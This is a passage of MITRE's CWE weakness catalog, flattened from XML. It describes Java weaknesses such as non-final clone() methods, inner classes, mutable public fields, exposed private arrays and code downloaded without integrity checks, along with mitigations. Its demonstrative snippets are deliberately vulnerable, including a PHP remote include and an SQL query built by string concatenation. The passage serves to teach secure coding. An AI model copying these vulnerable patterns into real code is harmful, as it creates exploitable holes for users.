declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state. + + + + + + + + + Implementation + + + + + Integrity + Other + Unexpected State + Varies by Context + + + + + Implementation + Make the cloneable() method final. + + + + + In this example, a public class "BankAccount" implements the cloneable() method which declares "Object clone(string accountnumber)": + + public class BankAccount implements Cloneable{ + public Object clone(String accountnumber) throwsCloneNotSupportedException{ + Object returnMe = new BankAccount(account number);... + + } + } + + + + In the example below, a clone() method is defined without being declared final. + + protected Object clone() throws CloneNotSupportedException {...} + + + + + + Mobile Code: Object Hijack + + + OBJ07-J + Sensitive classes must not let themselves be copied + + + SFP28 + Unexpected access points + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mobile Code: Object Hijack + Public cloneable() Method Without Final (aka 'Object Hijack') + + + + Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers. + Inner classes quietly introduce several security concerns because of the way they are translated into Java bytecode. In Java source code, it appears that an inner class can be declared to be accessible only by the enclosing class, but Java bytecode has no concept of an inner class, so the compiler must transform an inner class declaration into a peer class with package level access to the original outer class. More insidiously, since an inner class can access private fields in its enclosing class, once an inner class becomes a peer class in bytecode, the compiler converts private fields accessed by the inner class into protected fields. + + + + + + + + + Implementation + + + Medium + + + Confidentiality + Read Application Data + "Inner Classes" data confidentiality aspects can often be overcome. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Using sealed classes protects object-oriented encapsulation paradigms and therefore protects code from being extended in unforeseen ways. + + + Implementation + Inner Classes do not provide security. Warning: Never reduce the security of the object from an outer class, going to an inner class. If an outer class is final or private, ensure that its inner class is private as well. + + + + + The following Java Applet code mistakenly makes use of an inner class. + + public final class urlTool extends Applet {private final class urlHelper {...}...} + + + + The following example shows a basic use of inner classes. The class OuterClass contains the private member inner class InnerClass. The private inner class InnerClass includes the method concat that accesses the private member variables of the class OuterClass to output the value of one of the private member variables of the class OuterClass and returns a string that is a concatenation of one of the private member variables of the class OuterClass, the separator input parameter of the method and the private member variable of the class InnerClass. + + public class OuterClass { + // private member variables of OuterClass + private String memberOne;private String memberTwo; + + // constructor of OuterClass + public OuterClass(String varOne, String varTwo) {this.memberOne = varOne;this.memberTwo = varTwo;} + + // InnerClass is a member inner class of OuterClass + private class InnerClass {private String innerMemberOne; + public InnerClass(String innerVarOne) {this.innerMemberOne = innerVarOne;} + public String concat(String separator) { + // InnerClass has access to private member variables of OuterClass + System.out.println("Value of memberOne is: " + memberOne);return OuterClass.this.memberTwo + separator + this.innerMemberOne;}}} + + Although this is an acceptable use of inner classes it demonstrates one of the weaknesses of inner classes that inner classes have complete access to all member variables and methods of the enclosing class even those that are declared private and protected. When inner classes are compiled and translated into Java bytecode the JVM treats the inner class as a peer class with package level access to the enclosing class. + To avoid this weakness of inner classes, consider using either static inner classes, local inner classes, or anonymous inner classes. + The following Java example demonstrates the use of static inner classes using the previous example. The inner class InnerClass is declared using the static modifier that signifies that InnerClass is a static member of the enclosing class OuterClass. By declaring an inner class as a static member of the enclosing class, the inner class can only access other static members and methods of the enclosing class and prevents the inner class from accessing nonstatic member variables and methods of the enclosing class. In this case the inner class InnerClass can only access the static member variable memberTwo of the enclosing class OuterClass but cannot access the nonstatic member variable memberOne. + + public class OuterClass { + + + + // private member variables of OuterClass + private String memberOne;private static String memberTwo; + + // constructor of OuterClass + public OuterClass(String varOne, String varTwo) { + this.memberOne = varOne;this.memberTwo = varTwo;} + + // InnerClass is a static inner class of OuterClass + private static class InnerClass { + + private String innerMemberOne; + public InnerClass(String innerVarOne) {this.innerMemberOne = innerVarOne;}public String concat(String separator) { + + // InnerClass only has access to static member variables of OuterClass + return memberTwo + separator + this.innerMemberOne; + } + } + } + + The only limitation with using a static inner class is that as a static member of the enclosing class the inner class does not have a reference to instances of the enclosing class. For many situations this may not be ideal. An alternative is to use a local inner class or an anonymous inner class as shown in the next examples. + + + In the following example the BankAccount class contains the private member inner class InterestAdder that adds interest to the bank account balance. The start method of the BankAccount class creates an object of the inner class InterestAdder, the InterestAdder inner class implements the ActionListener interface with the method actionPerformed. A Timer object created within the start method of the BankAccount class invokes the actionPerformed method of the InterestAdder class every 30 days to add the interest to the bank account balance based on the interest rate passed to the start method as an input parameter. The inner class InterestAdder needs access to the private member variable balance of the BankAccount class in order to add the interest to the bank account balance. + However as demonstrated in the previous example, because InterestAdder is a non-static member inner class of the BankAccount class, InterestAdder also has access to the private member variables of the BankAccount class - including the sensitive data contained in the private member variables for the bank account owner's name, Social Security number, and the bank account number. + + public class BankAccount { + + + // private member variables of BankAccount class + private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance; + + // constructor for BankAccount class + public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);} + + // start method will add interest to balance every 30 days + + + // creates timer object and interest adding action listener object + public void start(double rate){ActionListener adder = new InterestAdder(rate);Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();} + + // InterestAdder is an inner class of BankAccount class + + + // that implements the ActionListener interface + private class InterestAdder implements ActionListener{ + private double rate; + public InterestAdder(double aRate){this.rate = aRate;} + public void actionPerformed(ActionEvent event){ + + // update interest + double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest; + } + + } + } + + In the following example the InterestAdder class from the above example is declared locally within the start method of the BankAccount class. As a local inner class InterestAdder has its scope restricted to the method (or enclosing block) where it is declared, in this case only the start method has access to the inner class InterestAdder, no other classes including the enclosing class has knowledge of the inner class outside of the start method. This allows the inner class to access private member variables of the enclosing class but only within the scope of the enclosing method or block. + + public class BankAccount { + + + // private member variables of BankAccount class + private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance; + + // constructor for BankAccount class + public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);} + + // start method will add interest to balance every 30 days + + + // creates timer object and interest adding action listener object + public void start(final double rate){ + + + // InterestAdder is a local inner class + + + // that implements the ActionListener interface + class InterestAdder implements ActionListener{ + public void actionPerformed(ActionEvent event){ + + // update interest + double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest; + } + }ActionListener adder = new InterestAdder();Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start(); + } + } + + A similar approach would be to use an anonymous inner class as demonstrated in the next example. An anonymous inner class is declared without a name and creates only a single instance of the inner class object. As in the previous example the anonymous inner class has its scope restricted to the start method of the BankAccount class. + + public class BankAccount { + + + // private member variables of BankAccount class + private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance; + + // constructor for BankAccount class + public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);} + + // start method will add interest to balance every 30 days + + + // creates timer object and interest adding action listener object + public void start(final double rate){ + + + // anonymous inner class that implements the ActionListener interface + ActionListener adder = new ActionListener(){ + public void actionPerformed(ActionEvent event){ + + + double interest = BankAccount.this.balance * rate / 100; + BankAccount.this.balance += interest; + } + }; + Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start(); + } + } + + + + In the following Java example a simple applet provides the capability for a user to input a URL into a text field and have the URL opened in a new browser window. The applet contains an inner class that is an action listener for the submit button, when the user clicks the submit button the inner class action listener's actionPerformed method will open the URL entered into the text field in a new browser window. As with the previous examples using inner classes in this manner creates a security risk by exposing private variables and methods. Inner classes create an additional security risk with applets as applets are executed on a remote machine through a web browser within the same JVM and therefore may run side-by-side with other potentially malicious code. + + public class UrlToolApplet extends Applet { + + + // private member variables for applet components + private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton; + + // init method that adds components to applet + + + // and creates button listener object + public void init() {setLayout(new FlowLayout());enterUrlLabel = new Label("Enter URL: ");enterUrlTextField = new TextField("", 20);submitButton = new Button("Submit");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);ActionListener submitButtonListener = new SubmitButtonListener();submitButton.addActionListener(submitButtonListener);} + + // button listener inner class for UrlToolApplet class + private class SubmitButtonListener implements ActionListener { + public void actionPerformed(ActionEvent evt) { + if (evt.getSource() == submitButton) {String urlString = enterUrlTextField.getText();URL url = null;try {url = new URL(urlString);} catch (MalformedURLException e) {System.err.println("Malformed URL: " + urlString);}if (url != null) {getAppletContext().showDocument(url);}} + } + } + } + + As with the previous examples a solution to this problem would be to use a static inner class, a local inner class or an anonymous inner class. An alternative solution would be to have the applet implement the action listener rather than using it as an inner class as shown in the following example. + + public class UrlToolApplet extends Applet implements ActionListener { + + + // private member variables for applet components + private Label enterUrlLabel;private TextField enterUrlTextField;private Button submitButton; + + // init method that adds components to applet + public void init() {setLayout(new FlowLayout());enterUrlLabel = new Label("Enter URL: ");enterUrlTextField = new TextField("", 20);submitButton = new Button("Submit");add(enterUrlLabel);add(enterUrlTextField);add(submitButton);submitButton.addActionListener(this);} + + // implementation of actionPerformed method of ActionListener interface + public void actionPerformed(ActionEvent evt) { + if (evt.getSource() == submitButton) {String urlString = enterUrlTextField.getText();URL url = null;try {url = new URL(urlString);} catch (MalformedURLException e) {System.err.println("Malformed URL: " + urlString);}if (url != null) {getAppletContext().showDocument(url);}} + } + } + + + + + + Mobile Code: Use of Inner Class + + + Publicizing of private data when using inner classes + + + OBJ08-J + Do not expose private members of an outer class from within a nested class + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Mobile code, in this case a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, References, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mobile Code: Use of Inner Class + + + + The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values. + If a field is non-final and public, it can be changed once the value is set by any function that has access to the class which contains the field. This could lead to a vulnerability if other parts of the program make assumptions about the contents of that field. + + + + + + + + + Mobile code, such as a Java Applet, is code that is transmitted across a network and executed on a remote machine. Because mobile code developers have little if any control of the environment in which their code will execute, special security concerns become relevant. One of the biggest environmental threats results from the risk that the mobile code will run side-by-side with other, potentially malicious, mobile code. Because all of the popular web browsers execute code from multiple sources together in the same JVM, many of the security guidelines for mobile code are focused on preventing manipulation of your objects' state and behavior by adversaries who have access to the same virtual machine where your program is running. + Final provides security by only allowing non-mutable objects to be changed after being set. However, only objects which are not extended can be made final. + + + + Implementation + + + High + + + Integrity + Modify Application Data + The object could potentially be tampered with. + + + Confidentiality + Read Application Data + The object could potentially allow the object to be read. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Declare all public fields as final when possible, especially if it is used to maintain internal state of an Applet or of classes used by an Applet. If a field must be public, then perform all appropriate sanity checks before accessing the field from your code. + + + + + Suppose this WidgetData class is used for an e-commerce web site. The programmer attempts to prevent price-tampering attacks by setting the price of the widget using the constructor. + + public final class WidgetData extends Applet {public float price;...public WidgetData(...) {this.price = LookupPrice("MyWidgetType");}} + + The price field is not final. Even though the value is set by the constructor, it could be modified by anybody that has access to an instance of WidgetData. + + + Assume the following code is intended to provide the location of a configuration file that controls execution of the application. + + public string configPath = "/etc/application/config.dat"; + + + public String configPath = new String("/etc/application/config.dat"); + + While this field is readable from any function, and thus might allow an information leak of a pathname, a more serious problem is that it can be changed by any function. + + + + + Mobile Code: Non-Final Public Field + + + Failure to provide confidentiality for stored data + + + OBJ10-J + Do not use public static nonfinal variables + + + SFP28 + Unexpected access points + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Description, Likelihood_of_Exploit, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Background_Details, Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Background_Details, Demonstrative_Examples, Description, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mobile Code: Non-final Public Field + + + + The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code. + An attacker can execute malicious code by compromising the host server, performing DNS spoofing, or modifying the code in transit. + + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + Medium + + + Integrity + Availability + Confidentiality + Other + Execute Unauthorized Code or Commands + Alter Execution Logic + Other + Executing untrusted code could compromise the control flow of the program. The untrusted code could execute attacker-controlled commands, read or modify sensitive resources, or prevent the software from functioning correctly for legitimate users. + + + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is typically required to find the behavior that triggers the download of code, and to determine whether integrity-checking methods are in use. + + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Black Box + + Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. + Attach the monitor to the process and also sniff the network connection. Trigger features related to product updates or plugin installation, which is likely to force a code download. Monitor when files are downloaded and separately executed, or if they are otherwise read back into the process. Look for evidence of cryptographic library calls that use integrity checking. + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Perform proper forward and reverse DNS lookups to detect DNS spoofing. + This is only a partial solution since it will not prevent your code from being modified on the hosting site or in transit. + + + Architecture and Design + Operation + + Encrypt the code with a reliable encryption scheme before transmitting. + This will only be a partial solution, since it will not detect DNS spoofing and it will not prevent your code from being modified on the hosting site. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Speficially, it may be helpful to use tools or frameworks to perform integrity checking on the transmitted code. + + When providing the code that is to be downloaded, such as for automatic updates of the software, then use cryptographic signatures for the code and modify the download clients to verify the signatures. Ensure that the implementation does not contain CWE-295, CWE-320, CWE-347, and related weaknesses. + Use code signing technologies such as Authenticode. See references [REF-454] [REF-455] [REF-456]. + + + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + + + This example loads an external class from a local subdirectory. + + URL[] classURLs= new URL[]{new URL("file:subdir/")};URLClassLoader loader = new URLClassLoader(classURLs);Class loadedClass = Class.forName("loadMe", true, loader); + + This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum. An attacker may be able to modify the class file to execute malicious code. + + + This code includes an external script to get database credentials, then authenticates a user against the database, allowing access to the application. + + + //assume the password is already encrypted, avoiding CWE-312 + + function authenticate($username,$password){ + include("http://external.example.com/dbInfo.php"); + + //dbInfo.php makes $dbhost, $dbuser, $dbpass, $dbname available + mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');mysql_select_db($dbname);$query = 'Select * from users where username='.$username.' And password='.$password;$result = mysql_query($query); + if(mysql_numrows($result) == 1){mysql_close();return true;}else{mysql_close();return false;} + } + + This code does not verify that the external domain accessed is the intended one. An attacker may somehow cause the external domain name to resolve to an attack server, which would provide the information for a false database. The attacker may then steal the usernames and encrypted passwords from real user login attempts, or simply allow themself to access the application without a real user account. + This example is also vulnerable to an Adversary-in-the-Middle AITM (CWE-300) attack. + + + + + CVE-2019-9534 + Satellite phone does not validate its firmware image. + https://www.cve.org/CVERecord?id=CVE-2019-9534 + + + CVE-2021-22909 + Chain: router's firmware update procedure uses curl with "-k" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494). + https://www.cve.org/CVERecord?id=CVE-2021-22909 + + + CVE-2008-3438 + OS does not verify authenticity of its own updates. + https://www.cve.org/CVERecord?id=CVE-2008-3438 + + + CVE-2008-3324 + online poker client does not verify authenticity of its own updates. + https://www.cve.org/CVERecord?id=CVE-2008-3324 + + + CVE-2001-1125 + anti-virus product does not verify automatic updates for itself. + https://www.cve.org/CVERecord?id=CVE-2001-1125 + + + CVE-2002-0671 + VOIP phone downloads applications from web sites without verifying integrity. + https://www.cve.org/CVERecord?id=CVE-2002-0671 + + + + + Invoking untrusted mobile code + + + SEC06-J + Do not rely on the default automatic signature verification provided by URLClassLoader and java.util.jar + + + SFP27 + Tainted input to environment + + + + + + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is critical for mobile code, but it is likely to become more and more common as developers continue to adopt automated, network-based product distributions and upgrades. Software-as-a-Service (SaaS) might introduce additional subtleties. Common exploitation scenarios may include ad server compromises and bad upgrades. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Description, Name, Other_Notes, Potential_Mitigations, References, Relationships, Research_Gaps, Type + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Observed_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Detection_Factors, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mobile Code: Invoking Untrusted Mobile Code + Download of Untrusted Mobile Code Without Integrity Check + + + + The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways. + + + + + + + + + + + + Implementation + + + + + Integrity + Modify Application Data + The contents of the data structure can be modified from outside the intended scope. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Declare the method private. + + + Implementation + Clone the member data and keep an unmodified version of the data private to the object. + + + Implementation + Use public setter methods that govern how a private member can be modified. + + + + + Here, a public method in a Java class returns a reference to a private array. Given that arrays in Java are mutable, any modifications made to the returned reference would be reflected in the original private array. + + private String[] colors;public String[] getColors() {return colors;} + + + + In this example, the Color class defines functions that return non-const references to private members (an array type and an integer type), which are then arbitrarily altered from outside the control of the class. + + class Color{private:int[2] colorArray;int colorValue;public:Color () : colorArray { 1, 2 }, colorValue (3) { };int[2] & fa () { return colorArray; } // return reference to private arrayint & fv () { return colorValue; } // return reference to private integer};int main (){Color c;c.fa () [1] = 42; // modifies private array elementc.fv () = 42; // modifies private intreturn 0;} + + + + + + Private Array-Typed Field Returned From A Public Method + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Private Array-Typed Field Returned From A Public Method + + + + Assigning public data to a private array is equivalent to giving public access to the array. + + + + + + + + + + + + Implementation + + + + + Integrity + Modify Application Data + The contents of the array can be modified from outside the intended scope. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Do not allow objects to modify private members of a class. + + + + + In the example below, the setRoles() method assigns a publically-controllable array to a private field, thus allowing the caller to modify the private array directly by virtue of the fact that arrays in Java are mutable. + + private String[] userRoles;public void setUserRoles(String[] userRoles) {this.userRoles = userRoles;} + + + + + + Public Data Assigned to Private Array-Typed Field + + + SFP25 + Tainted input to variable + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated 